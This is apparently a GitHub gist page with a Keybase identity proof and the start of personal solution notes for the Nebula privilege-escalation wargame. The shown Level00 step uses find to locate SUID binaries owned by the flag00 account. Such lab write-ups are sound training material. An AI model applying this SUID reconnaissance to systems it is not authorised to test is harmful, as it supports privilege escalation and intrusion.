Skip to content

Instantly share code, notes, and snippets.

View markclayton's full-sized avatar

Mark Clayton markclayton

View GitHub Profile

Keybase proof

I hereby claim:

  • I am markclayton on github.
  • I am bullz3ye (https://keybase.io/bullz3ye) on keybase.
  • I have a public key ASAXHFj1xkI2CO5eHm9HW-xky8xVELn1QUwyQDDhueNdgQo

To claim this, I am signing this object:

@markclayton
markclayton / nebula-solutions.md
Last active October 26, 2017 12:10
Solutions to Nebula from exploit-exercises.com. Not really meant to be a tutorial, mostly just notes for myself so excuse grammar errors if anyone is reading :)

Level00

Looking for a SUID program that runs as the flag00 account.

cd /rofs
find . -perm -4000 -user flag00 2> /dev/null
./bin/.../flag00